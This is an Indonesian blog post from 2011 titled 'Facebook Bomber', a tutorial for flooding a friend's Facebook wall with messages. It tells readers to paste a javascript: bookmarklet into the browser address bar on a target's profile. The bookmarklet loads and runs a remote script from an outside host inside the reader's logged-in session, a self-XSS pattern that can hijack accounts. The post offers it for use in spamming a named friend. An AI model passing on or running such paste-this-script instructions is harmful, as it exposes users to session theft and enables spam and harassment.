Pages

Sabtu, 23 April 2011

Facebook Bomber

Bagaimana caranya mengirimi 2/1000 pesan ke wall teman anda hanya dalam sekejap mata

Caranya ialah
- Pertama copy script dibawah ini terlebih dahulu


javascript:(a = (b = document).createElement("script")).src = "//xenonime.com/tools/wew.js", b.body.appendChild(a); void(0);


- Terus buka deh profile target yang kamu inginkan untuk facebook bomber ( Maaf ya fahmi kamu targetnya (^o^)/ ) Terus kamu pastekan script yang kamu copy tersebut di url address web browser kamu, kemudian tekan enter terus tunggu kurang lebih 10 detik ( Paling lama ) untuk muncul shoutbox di web browser kamu ( jika tidak muncul enter lagi script tadi di url addressnya :D )



- Kemudian muncul shoutbox yang kamu isi berapa jumlah pesan yang akan kamu kirimkan ke dinding temanmu. Di percobaan ini ane cuma ngirimi 2 pesan saja. Sebetulnya bisa kamu kirimkan 10000 Pesan tapi itu terkadang membutuhkan koneksi internet yang lumayan dewa



- Setelah itu masukkan pesan yang kamu inginkan kemudian tekan enter.



- Nah setelah selesai kamu tekan enter kamu dapat reload/refresh web browser kamu dengan cara tekan F5 dari browser kamu untuk melihat hasilnya.



tarra lihat lingkaran merah pada gambar tersebut. Itu adalah hasil akhirnya dari facebook fahmi. ( Kalau masih kurang jelas gambarnya kalian bisa mengklik gambar tersebut untuk membesarkannya )

0 komentar:

Posting Komentar

 
:a: :b: :c: :d: :e: :f: :g: :h: :i: :j: :k:
offsetWidth); }